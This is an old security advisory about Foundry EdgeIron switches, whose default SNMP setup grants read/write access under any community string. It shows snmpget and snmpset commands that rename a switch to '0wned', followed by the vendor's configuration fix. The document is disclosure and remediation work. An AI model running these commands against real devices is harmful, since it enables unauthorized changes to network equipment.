COMMAND

	Foundry Networks EdgeIron SNMP opened R/W to **any** community name

SYSTEMS AFFECTED

	Foundry Networks EdgeIron, current release as of 21 March 2002

PROBLEM

	From advisory@prophecy.net.nz :
	

	Default SNMP configuration allows SNMP requests to the switch  with  any
	community string to have read and write access. All that is required  is
	IP access to the switch.
	

	 Example:

	 -------

	

	[prophecy@loki ~]$ snmpget 10.1.1.120 public system.sysName

	system.sysName.0 =

	[prophecy@loki ~]$

	[prophecy@loki ~]$ snmpset 10.1.1.120 totallyinvalidcommunitystring

	system.sysName s \"0wned\"

	system.sysName.0 = 0wned

	[prophecy@loki ~]$

	

	I have tested this both before  and  AFTER  deleting  the  default  SNMP
	communities from the switch.  The  default  strings  are:  public  (RO),
	private (RW).

SOLUTION

	It turns out that this is less a problem,  and  more  a  \'feature\'  of
	these  switches.  The  fix  from  Foundry  is  to  issue  the  following
	commands:
	

	EdgeIron(config)#

	EdgeIron(config)#snmp-server security

	EdgeIron(config)#

	EdgeIron(config)#snmp-server user <name> <community-string> <ip-address>

	

	This then allows the specified IP  to  talk  to  the  switch  with  that
	community  string.  Requests  from  other  IP\'s  are  ignored  and  the
	\'snmp-server security\' option  basically  turns  on  the  checking  of
	SNMPv1 community strings.